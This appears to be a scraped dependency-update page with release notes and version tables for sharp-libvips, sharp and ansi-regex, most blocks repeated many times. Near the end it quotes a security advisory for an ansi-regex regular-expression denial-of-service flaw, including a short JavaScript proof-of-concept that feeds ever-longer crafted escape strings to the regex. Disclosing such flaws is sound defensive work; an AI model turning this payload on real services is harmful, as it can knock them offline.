• Bump deps: archive, xml2
• CI: Update macOS to 15 (Sequoia)
• mozjpeg: temporarily build from latest commit
• Bump dep: harfbuzz
• Bump deps: expat, harfbuzz, tiff (#297)

1.2.4

Dependency	Version
aom	3.13.1
archive	3.8.2
cairo	1.18.4
cgif	0.5.0
exif	0.6.25
expat	2.7.3
ffi	3.5.2
fontconfig	2.17.1
freetype	2.14.1
fribidi	1.0.16
glib	2.86.1
harfbuzz	12.1.0
heif	1.20.2
hwy	1.3.0
imagequant	2.4.1
lcms	2.17
mozjpeg	0826579
pango	1.57.0
pixman	0.46.4
png	1.6.50
proxy-libintl	0.5
rsvg	2.61.2
spng	0.7.4
tiff	4.7.1
vips	8.17.3
webp	1.6.0
xml2	2.15.1
zlib-ng	2.2.5

1.2.3

Dependency	Version
aom	3.13.1
archive	3.8.1
cairo	1.18.4
cgif	0.5.0
exif	0.6.25
expat	2.7.2
ffi	3.5.2
fontconfig	2.17.1
freetype	2.14.1
fribidi	1.0.16
glib	2.86.0
harfbuzz	11.5.0
heif	1.20.2
hwy	1.3.0
imagequant	2.4.1
lcms	2.17
mozjpeg	4.1.5
pango	1.57.0
pixman	0.46.4
png	1.6.50
proxy-libintl	0.5
rsvg	2.61.1
spng	0.7.4
tiff	4.7.0
vips	8.17.2
webp	1.6.0
xml2	2.15.0
zlib-ng	2.2.5

1.2.2

Dependency	Version
aom	3.13.1
archive	3.8.1
cairo	1.18.4
cgif	0.5.0
exif	0.6.25
expat	2.7.1
ffi	3.5.2
fontconfig	2.17.1
freetype	2.14.1
fribidi	1.0.16
glib	2.86.0
harfbuzz	11.5.0
heif	1.20.2
hwy	1.3.0
imagequant	2.4.1
lcms	2.17
mozjpeg	4.1.5
pango	1.57.0
pixman	0.46.4
png	1.6.50
proxy-libintl	0.5
rsvg	2.61.1
spng	0.7.4
tiff	4.7.0
vips	8.17.2
webp	1.6.0
xml2	2.14.6
zlib-ng	2.2.5

Does any of this look wrong? Please let us know.

See the full diff on Github. The new version differs by 11 commits:

• Release v1.2.4
• Prerelease v1.2.4-rc.0
• Upgrade to libvips v8.17.3
• Bump dep: glib (#299)
• Bump dep: rsvg (#298)
• aom: patch to allow use of nasm v3 (as now provided by homebrew)
• Bump deps: archive, xml2
• CI: Update macOS to 15 (Sequoia)
• mozjpeg: temporarily build from latest commit
• Bump dep: harfbuzz
• Bump deps: expat, harfbuzz, tiff (#297)

1.2.4

Dependency	Version
aom	3.13.1
archive	3.8.2
cairo	1.18.4
cgif	0.5.0
exif	0.6.25
expat	2.7.3
ffi	3.5.2
fontconfig	2.17.1
freetype	2.14.1
fribidi	1.0.16
glib	2.86.1
harfbuzz	12.1.0
heif	1.20.2
hwy	1.3.0
imagequant	2.4.1
lcms	2.17
mozjpeg	0826579
pango	1.57.0
pixman	0.46.4
png	1.6.50
proxy-libintl	0.5
rsvg	2.61.2
spng	0.7.4
tiff	4.7.1
vips	8.17.3
webp	1.6.0
xml2	2.15.1
zlib-ng	2.2.5

1.2.3

Dependency	Version
aom	3.13.1
archive	3.8.1
cairo	1.18.4
cgif	0.5.0
exif	0.6.25
expat	2.7.2
ffi	3.5.2
fontconfig	2.17.1
freetype	2.14.1
fribidi	1.0.16
glib	2.86.0
harfbuzz	11.5.0
heif	1.20.2
hwy	1.3.0
imagequant	2.4.1
lcms	2.17
mozjpeg	4.1.5
pango	1.57.0
pixman	0.46.4
png	1.6.50
proxy-libintl	0.5
rsvg	2.61.1
spng	0.7.4
tiff	4.7.0
vips	8.17.2
webp	1.6.0
xml2	2.15.0
zlib-ng	2.2.5

1.2.2

Dependency	Version
aom	3.13.1
archive	3.8.1
cairo	1.18.4
cgif	0.5.0
exif	0.6.25
expat	2.7.1
ffi	3.5.2
fontconfig	2.17.1
freetype	2.14.1
fribidi	1.0.16
glib	2.86.0
harfbuzz	11.5.0
heif	1.20.2
hwy	1.3.0
imagequant	2.4.1
lcms	2.17
mozjpeg	4.1.5
pango	1.57.0
pixman	0.46.4
png	1.6.50
proxy-libintl	0.5
rsvg	2.61.1
spng	0.7.4
tiff	4.7.0
vips	8.17.2
webp	1.6.0
xml2	2.14.6
zlib-ng	2.2.5

Does any of this look wrong? Please let us know.

See the full diff on Github. The new version differs by 11 commits:

• Release v1.2.4
• Prerelease v1.2.4-rc.0
• Upgrade to libvips v8.17.3
• Bump dep: glib (#299)
• Bump dep: rsvg (#298)
• aom: patch to allow use of nasm v3 (as now provided by homebrew)
• Bump deps: archive, xml2
• CI: Update macOS to 15 (Sequoia)
• mozjpeg: temporarily build from latest commit
• Bump dep: harfbuzz
• Bump deps: expat, harfbuzz, tiff (#297)

1.2.4

Dependency	Version
aom	3.13.1
archive	3.8.2
cairo	1.18.4
cgif	0.5.0
exif	0.6.25
expat	2.7.3
ffi	3.5.2
fontconfig	2.17.1
freetype	2.14.1
fribidi	1.0.16
glib	2.86.1
harfbuzz	12.1.0
heif	1.20.2
hwy	1.3.0
imagequant	2.4.1
lcms	2.17
mozjpeg	0826579
pango	1.57.0
pixman	0.46.4
png	1.6.50
proxy-libintl	0.5
rsvg	2.61.2
spng	0.7.4
tiff	4.7.1
vips	8.17.3
webp	1.6.0
xml2	2.15.1
zlib-ng	2.2.5

1.2.3

Dependency	Version
aom	3.13.1
archive	3.8.1
cairo	1.18.4
cgif	0.5.0
exif	0.6.25
expat	2.7.2
ffi	3.5.2
fontconfig	2.17.1
freetype	2.14.1
fribidi	1.0.16
glib	2.86.0
harfbuzz	11.5.0
heif	1.20.2
hwy	1.3.0
imagequant	2.4.1
lcms	2.17
mozjpeg	4.1.5
pango	1.57.0
pixman	0.46.4
png	1.6.50
proxy-libintl	0.5
rsvg	2.61.1
spng	0.7.4
tiff	4.7.0
vips	8.17.2
webp	1.6.0
xml2	2.15.0
zlib-ng	2.2.5

1.2.2

Dependency	Version
aom	3.13.1
archive	3.8.1
cairo	1.18.4
cgif	0.5.0
exif	0.6.25
expat	2.7.1
ffi	3.5.2
fontconfig	2.17.1
freetype	2.14.1
fribidi	1.0.16
glib	2.86.0
harfbuzz	11.5.0
heif	1.20.2
hwy	1.3.0
imagequant	2.4.1
lcms	2.17
mozjpeg	4.1.5
pango	1.57.0
pixman	0.46.4
png	1.6.50
proxy-libintl	0.5
rsvg	2.61.1
spng	0.7.4
tiff	4.7.0
vips	8.17.2
webp	1.6.0
xml2	2.14.6
zlib-ng	2.2.5

Does any of this look wrong? Please let us know.

See the full diff on Github. The new version differs by 11 commits:

• Release v1.2.4
• Prerelease v1.2.4-rc.0
• Upgrade to libvips v8.17.3
• Bump dep: glib (#299)
• Bump dep: rsvg (#298)
• aom: patch to allow use of nasm v3 (as now provided by homebrew)
• Bump deps: archive, xml2
• CI: Update macOS to 15 (Sequoia)
• mozjpeg: temporarily build from latest commit
• Bump dep: harfbuzz
• Bump deps: expat, harfbuzz, tiff (#297)

1.2.4

Dependency	Version
aom	3.13.1
archive	3.8.2
cairo	1.18.4
cgif	0.5.0
exif	0.6.25
expat	2.7.3
ffi	3.5.2
fontconfig	2.17.1
freetype	2.14.1
fribidi	1.0.16
glib	2.86.1
harfbuzz	12.1.0
heif	1.20.2
hwy	1.3.0
imagequant	2.4.1
lcms	2.17
mozjpeg	0826579
pango	1.57.0
pixman	0.46.4
png	1.6.50
proxy-libintl	0.5
rsvg	2.61.2
spng	0.7.4
tiff	4.7.1
vips	8.17.3
webp	1.6.0
xml2	2.15.1
zlib-ng	2.2.5

1.2.3

Dependency	Version
aom	3.13.1
archive	3.8.1
cairo	1.18.4
cgif	0.5.0
exif	0.6.25
expat	2.7.2
ffi	3.5.2
fontconfig	2.17.1
freetype	2.14.1
fribidi	1.0.16
glib	2.86.0
harfbuzz	11.5.0
heif	1.20.2
hwy	1.3.0
imagequant	2.4.1
lcms	2.17
mozjpeg	4.1.5
pango	1.57.0
pixman	0.46.4
png	1.6.50
proxy-libintl	0.5
rsvg	2.61.1
spng	0.7.4
tiff	4.7.0
vips	8.17.2
webp	1.6.0
xml2	2.15.0
zlib-ng	2.2.5

1.2.2

Dependency	Version
aom	3.13.1
archive	3.8.1
cairo	1.18.4
cgif	0.5.0
exif	0.6.25
expat	2.7.1
ffi	3.5.2
fontconfig	2.17.1
freetype	2.14.1
fribidi	1.0.16
glib	2.86.0
harfbuzz	11.5.0
heif	1.20.2
hwy	1.3.0
imagequant	2.4.1
lcms	2.17
mozjpeg	4.1.5
pango	1.57.0
pixman	0.46.4
png	1.6.50
proxy-libintl	0.5
rsvg	2.61.1
spng	0.7.4
tiff	4.7.0
vips	8.17.2
webp	1.6.0
xml2	2.14.6
zlib-ng	2.2.5

Does any of this look wrong? Please let us know.

See the full diff on Github. The new version differs by 11 commits:

• Release v1.2.4
• Prerelease v1.2.4-rc.0
• Upgrade to libvips v8.17.3
• Bump dep: glib (#299)
• Bump dep: rsvg (#298)
• aom: patch to allow use of nasm v3 (as now provided by homebrew)
• Bump deps: archive, xml2
• CI: Update macOS to 15 (Sequoia)
• mozjpeg: temporarily build from latest commit
• Bump dep: harfbuzz
• Bump deps: expat, harfbuzz, tiff (#297)

1.2.4

Dependency	Version
aom	3.13.1
archive	3.8.2
cairo	1.18.4
cgif	0.5.0
exif	0.6.25
expat	2.7.3
ffi	3.5.2
fontconfig	2.17.1
freetype	2.14.1
fribidi	1.0.16
glib	2.86.1
harfbuzz	12.1.0
heif	1.20.2
hwy	1.3.0
imagequant	2.4.1
lcms	2.17
mozjpeg	0826579
pango	1.57.0
pixman	0.46.4
png	1.6.50
proxy-libintl	0.5
rsvg	2.61.2
spng	0.7.4
tiff	4.7.1
vips	8.17.3
webp	1.6.0
xml2	2.15.1
zlib-ng	2.2.5

1.2.3

Dependency	Version
aom	3.13.1
archive	3.8.1
cairo	1.18.4
cgif	0.5.0
exif	0.6.25
expat	2.7.2
ffi	3.5.2
fontconfig	2.17.1
freetype	2.14.1
fribidi	1.0.16
glib	2.86.0
harfbuzz	11.5.0
heif	1.20.2
hwy	1.3.0
imagequant	2.4.1
lcms	2.17
mozjpeg	4.1.5
pango	1.57.0
pixman	0.46.4
png	1.6.50
proxy-libintl	0.5
rsvg	2.61.1
spng	0.7.4
tiff	4.7.0
vips	8.17.2
webp	1.6.0
xml2	2.15.0
zlib-ng	2.2.5

1.2.2

Dependency	Version
aom	3.13.1
archive	3.8.1
cairo	1.18.4
cgif	0.5.0
exif	0.6.25
expat	2.7.1
ffi	3.5.2
fontconfig	2.17.1
freetype	2.14.1
fribidi	1.0.16
glib	2.86.0
harfbuzz	11.5.0
heif	1.20.2
hwy	1.3.0
imagequant	2.4.1
lcms	2.17
mozjpeg	4.1.5
pango	1.57.0
pixman	0.46.4
png	1.6.50
proxy-libintl	0.5
rsvg	2.61.1
spng	0.7.4
tiff	4.7.0
vips	8.17.2
webp	1.6.0
xml2	2.14.6
zlib-ng	2.2.5

Does any of this look wrong? Please let us know.

See the full diff on Github. The new version differs by 11 commits:

• Release v1.2.4
• Prerelease v1.2.4-rc.0
• Upgrade to libvips v8.17.3
• Bump dep: glib (#299)
• Bump dep: rsvg (#298)
• aom: patch to allow use of nasm v3 (as now provided by homebrew)
• Bump deps: archive, xml2
• CI: Update macOS to 15 (Sequoia)
• mozjpeg: temporarily build from latest commit
• Bump dep: harfbuzz
• Bump deps: expat, harfbuzz, tiff (#297)

1.2.4

Dependency	Version
aom	3.13.1
archive	3.8.2
cairo	1.18.4
cgif	0.5.0
exif	0.6.25
expat	2.7.3
ffi	3.5.2
fontconfig	2.17.1
freetype	2.14.1
fribidi	1.0.16
glib	2.86.1
harfbuzz	12.1.0
heif	1.20.2
hwy	1.3.0
imagequant	2.4.1
lcms	2.17
mozjpeg	0826579
pango	1.57.0
pixman	0.46.4
png	1.6.50
proxy-libintl	0.5
rsvg	2.61.2
spng	0.7.4
tiff	4.7.1
vips	8.17.3
webp	1.6.0
xml2	2.15.1
zlib-ng	2.2.5

1.2.3

Dependency	Version
aom	3.13.1
archive	3.8.1
cairo	1.18.4
cgif	0.5.0
exif	0.6.25
expat	2.7.2
ffi	3.5.2
fontconfig	2.17.1
freetype	2.14.1
fribidi	1.0.16
glib	2.86.0
harfbuzz	11.5.0
heif	1.20.2
hwy	1.3.0
imagequant	2.4.1
lcms	2.17
mozjpeg	4.1.5
pango	1.57.0
pixman	0.46.4
png	1.6.50
proxy-libintl	0.5
rsvg	2.61.1
spng	0.7.4
tiff	4.7.0
vips	8.17.2
webp	1.6.0
xml2	2.15.0
zlib-ng	2.2.5

1.2.2

Dependency	Version
aom	3.13.1
archive	3.8.1
cairo	1.18.4
cgif	0.5.0
exif	0.6.25
expat	2.7.1
ffi	3.5.2
fontconfig	2.17.1
freetype	2.14.1
fribidi	1.0.16
glib	2.86.0
harfbuzz	11.5.0
heif	1.20.2
hwy	1.3.0
imagequant	2.4.1
lcms	2.17
mozjpeg	4.1.5
pango	1.57.0
pixman	0.46.4
png	1.6.50
proxy-libintl	0.5
rsvg	2.61.1
spng	0.7.4
tiff	4.7.0
vips	8.17.2
webp	1.6.0
xml2	2.14.6
zlib-ng	2.2.5

Does any of this look wrong? Please let us know.

See the full diff on Github. The new version differs by 11 commits:

• Release v1.2.4
• Prerelease v1.2.4-rc.0
• Upgrade to libvips v8.17.3
• Bump dep: glib (#299)
• Bump dep: rsvg (#298)
• aom: patch to allow use of nasm v3 (as now provided by homebrew)
• Bump deps: archive, xml2
• CI: Update macOS to 15 (Sequoia)
• mozjpeg: temporarily build from latest commit
• Bump dep: harfbuzz
• Bump deps: expat, harfbuzz, tiff (#297)

0.34.5

• Upgrade to libvips v8.17.3 for upstream bug fixes.

• Add experimental support for prebuilt Linux RISC-V 64-bit binaries.

• Support building from source with npm v12+, deprecate --build-from-source flag.
  #4458

• Add support for BigTIFF output.
  #4459
  @throwbi

• Improve error messaging when only warnings issued.
  #4465

• Simplify ICC processing when retaining input profiles.
  #4468

0.34.4

• Upgrade to libvips v8.17.2 for upstream bug fixes.

• Ensure TIFF subifd and OpenSlide level input options are respected (regression in 0.34.3).

• Ensure autoOrient occurs before non-90 angle rotation.
  #4425

• Ensure autoOrient removes existing metadata after shrink-on-load.
  #4431

• TypeScript: Ensure KernelEnum includes linear.
  #4441
  @BayanBennett

• Ensure unlimited flag is passed upstream when reading TIFF images.
  #4446

• Support Electron memory cage when reading XMP metadata (regression in 0.34.3).
  #4451

• Add sharp-libvips rpath for yarn v5 support.
  #4452
  @arcanis

Does any of this look wrong? Please let us know.

See the full diff on Github. The new version differs by more commits than we can show here.

0.34.5

• Upgrade to libvips v8.17.3 for upstream bug fixes.

• Add experimental support for prebuilt Linux RISC-V 64-bit binaries.

• Support building from source with npm v12+, deprecate --build-from-source flag.
  #4458

• Add support for BigTIFF output.
  #4459
  @throwbi

• Improve error messaging when only warnings issued.
  #4465

• Simplify ICC processing when retaining input profiles.
  #4468

0.34.4

• Upgrade to libvips v8.17.2 for upstream bug fixes.

• Ensure TIFF subifd and OpenSlide level input options are respected (regression in 0.34.3).

• Ensure autoOrient occurs before non-90 angle rotation.
  #4425

• Ensure autoOrient removes existing metadata after shrink-on-load.
  #4431

• TypeScript: Ensure KernelEnum includes linear.
  #4441
  @BayanBennett

• Ensure unlimited flag is passed upstream when reading TIFF images.
  #4446

• Support Electron memory cage when reading XMP metadata (regression in 0.34.3).
  #4451

• Add sharp-libvips rpath for yarn v5 support.
  #4452
  @arcanis

Does any of this look wrong? Please let us know.

See the full diff on Github. The new version differs by more commits than we can show here.

0.34.5

• Upgrade to libvips v8.17.3 for upstream bug fixes.

• Add experimental support for prebuilt Linux RISC-V 64-bit binaries.

• Support building from source with npm v12+, deprecate --build-from-source flag.
  #4458

• Add support for BigTIFF output.
  #4459
  @throwbi

• Improve error messaging when only warnings issued.
  #4465

• Simplify ICC processing when retaining input profiles.
  #4468

0.34.4

• Upgrade to libvips v8.17.2 for upstream bug fixes.

• Ensure TIFF subifd and OpenSlide level input options are respected (regression in 0.34.3).

• Ensure autoOrient occurs before non-90 angle rotation.
  #4425

• Ensure autoOrient removes existing metadata after shrink-on-load.
  #4431

• TypeScript: Ensure KernelEnum includes linear.
  #4441
  @BayanBennett

• Ensure unlimited flag is passed upstream when reading TIFF images.
  #4446

• Support Electron memory cage when reading XMP metadata (regression in 0.34.3).
  #4451

• Add sharp-libvips rpath for yarn v5 support.
  #4452
  @arcanis

Does any of this look wrong? Please let us know.

See the full diff on Github. The new version differs by more commits than we can show here.

0.34.5

• Upgrade to libvips v8.17.3 for upstream bug fixes.

• Add experimental support for prebuilt Linux RISC-V 64-bit binaries.

• Support building from source with npm v12+, deprecate --build-from-source flag.
  #4458

• Add support for BigTIFF output.
  #4459
  @throwbi

• Improve error messaging when only warnings issued.
  #4465

• Simplify ICC processing when retaining input profiles.
  #4468

0.34.4

• Upgrade to libvips v8.17.2 for upstream bug fixes.

• Ensure TIFF subifd and OpenSlide level input options are respected (regression in 0.34.3).

• Ensure autoOrient occurs before non-90 angle rotation.
  #4425

• Ensure autoOrient removes existing metadata after shrink-on-load.
  #4431

• TypeScript: Ensure KernelEnum includes linear.
  #4441
  @BayanBennett

• Ensure unlimited flag is passed upstream when reading TIFF images.
  #4446

• Support Electron memory cage when reading XMP metadata (regression in 0.34.3).
  #4451

• Add sharp-libvips rpath for yarn v5 support.
  #4452
  @arcanis

Does any of this look wrong? Please let us know.

See the full diff on Github. The new version differs by more commits than we can show here.

0.34.5

• Upgrade to libvips v8.17.3 for upstream bug fixes.

• Add experimental support for prebuilt Linux RISC-V 64-bit binaries.

• Support building from source with npm v12+, deprecate --build-from-source flag.
  #4458

• Add support for BigTIFF output.
  #4459
  @throwbi

• Improve error messaging when only warnings issued.
  #4465

• Simplify ICC processing when retaining input profiles.
  #4468

0.34.4

• Upgrade to libvips v8.17.2 for upstream bug fixes.

• Ensure TIFF subifd and OpenSlide level input options are respected (regression in 0.34.3).

• Ensure autoOrient occurs before non-90 angle rotation.
  #4425

• Ensure autoOrient removes existing metadata after shrink-on-load.
  #4431

• TypeScript: Ensure KernelEnum includes linear.
  #4441
  @BayanBennett

• Ensure unlimited flag is passed upstream when reading TIFF images.
  #4446

• Support Electron memory cage when reading XMP metadata (regression in 0.34.3).
  #4451

• Add sharp-libvips rpath for yarn v5 support.
  #4452
  @arcanis

Does any of this look wrong? Please let us know.

See the full diff on Github. The new version differs by more commits than we can show here.

0.34.5

• Upgrade to libvips v8.17.3 for upstream bug fixes.

• Add experimental support for prebuilt Linux RISC-V 64-bit binaries.

• Support building from source with npm v12+, deprecate --build-from-source flag.
  #4458

• Add support for BigTIFF output.
  #4459
  @throwbi

• Improve error messaging when only warnings issued.
  #4465

• Simplify ICC processing when retaining input profiles.
  #4468

0.34.4

• Upgrade to libvips v8.17.2 for upstream bug fixes.

• Ensure TIFF subifd and OpenSlide level input options are respected (regression in 0.34.3).

• Ensure autoOrient occurs before non-90 angle rotation.
  #4425

• Ensure autoOrient removes existing metadata after shrink-on-load.
  #4431

• TypeScript: Ensure KernelEnum includes linear.
  #4441
  @BayanBennett

• Ensure unlimited flag is passed upstream when reading TIFF images.
  #4446

• Support Electron memory cage when reading XMP metadata (regression in 0.34.3).
  #4451

• Add sharp-libvips rpath for yarn v5 support.
  #4452
  @arcanis

Does any of this look wrong? Please let us know.

See the full diff on Github. The new version differs by more commits than we can show here.

0.34.5

• Upgrade to libvips v8.17.3 for upstream bug fixes.

• Add experimental support for prebuilt Linux RISC-V 64-bit binaries.

• Support building from source with npm v12+, deprecate --build-from-source flag.
  #4458

• Add support for BigTIFF output.
  #4459
  @throwbi

• Improve error messaging when only warnings issued.
  #4465

• Simplify ICC processing when retaining input profiles.
  #4468

0.34.4

• Upgrade to libvips v8.17.2 for upstream bug fixes.

• Ensure TIFF subifd and OpenSlide level input options are respected (regression in 0.34.3).

• Ensure autoOrient occurs before non-90 angle rotation.
  #4425

• Ensure autoOrient removes existing metadata after shrink-on-load.
  #4431

• TypeScript: Ensure KernelEnum includes linear.
  #4441
  @BayanBennett

• Ensure unlimited flag is passed upstream when reading TIFF images.
  #4446

• Support Electron memory cage when reading XMP metadata (regression in 0.34.3).
  #4451

• Add sharp-libvips rpath for yarn v5 support.
  #4452
  @arcanis

Does any of this look wrong? Please let us know.

See the full diff on Github. The new version differs by more commits than we can show here.

0.34.5

• Upgrade to libvips v8.17.3 for upstream bug fixes.

• Add experimental support for prebuilt Linux RISC-V 64-bit binaries.

• Support building from source with npm v12+, deprecate --build-from-source flag.
  #4458

• Add support for BigTIFF output.
  #4459
  @throwbi

• Improve error messaging when only warnings issued.
  #4465

• Simplify ICC processing when retaining input profiles.
  #4468

0.34.4

• Upgrade to libvips v8.17.2 for upstream bug fixes.

• Ensure TIFF subifd and OpenSlide level input options are respected (regression in 0.34.3).

• Ensure autoOrient occurs before non-90 angle rotation.
  #4425

• Ensure autoOrient removes existing metadata after shrink-on-load.
  #4431

• TypeScript: Ensure KernelEnum includes linear.
  #4441
  @BayanBennett

• Ensure unlimited flag is passed upstream when reading TIFF images.
  #4446

• Support Electron memory cage when reading XMP metadata (regression in 0.34.3).
  #4451

• Add sharp-libvips rpath for yarn v5 support.
  #4452
  @arcanis

Does any of this look wrong? Please let us know.

See the full diff on Github. The new version differs by more commits than we can show here.

0.34.5

• Upgrade to libvips v8.17.3 for upstream bug fixes.

• Add experimental support for prebuilt Linux RISC-V 64-bit binaries.

• Support building from source with npm v12+, deprecate --build-from-source flag.
  #4458

• Add support for BigTIFF output.
  #4459
  @throwbi

• Improve error messaging when only warnings issued.
  #4465

• Simplify ICC processing when retaining input profiles.
  #4468

0.34.4

• Upgrade to libvips v8.17.2 for upstream bug fixes.

• Ensure TIFF subifd and OpenSlide level input options are respected (regression in 0.34.3).

• Ensure autoOrient occurs before non-90 angle rotation.
  #4425

• Ensure autoOrient removes existing metadata after shrink-on-load.
  #4431

• TypeScript: Ensure KernelEnum includes linear.
  #4441
  @BayanBennett

• Ensure unlimited flag is passed upstream when reading TIFF images.
  #4446

• Support Electron memory cage when reading XMP metadata (regression in 0.34.3).
  #4451

• Add sharp-libvips rpath for yarn v5 support.
  #4452
  @arcanis

Does any of this look wrong? Please let us know.

See the full diff on Github. The new version differs by more commits than we can show here.

5.3.0 (from changelog)

2025-09-04

Features

• feat: add suffixRegex & support multiple string (#1886)

Does any of this look wrong? Please let us know.

🚨 Inefficient Regular Expression Complexity in chalk/ansi-regex

ansi-regex is vulnerable to Inefficient Regular Expression Complexity which could lead to a denial of service when parsing invalid ANSI escape codes.

Proof of Concept

import ansiRegex from 'ansi-regex';
for(var i = 1; i <= 50000; i++) {
    var time = Date.now();
    var attack_str = "\u001B["+";".repeat(i*10000);
    ansiRegex().test(attack_str)
    var time_cost = Date.now() - time;
    console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}

The ReDOS is mainly due to the sub-patterns [[\\]()#;?]* and (?:;[-a-zA-Z\\d\\/#&.:=?%@~_]*)*

6.2.2

• Fix vulnerability in 6.2.1, see: chalk/chalk#656

6.2.0

• Support colon separated parameters to control sequences (#62) df7d75f

---

v6.1.0...v6.2.0

6.1.0

• Match cursorSave and cursorRestore escape codes (#45) 02fa893
• Fix: Handle all valid ST characters (#58) 9cba40d

v6.0.1...v6.1.0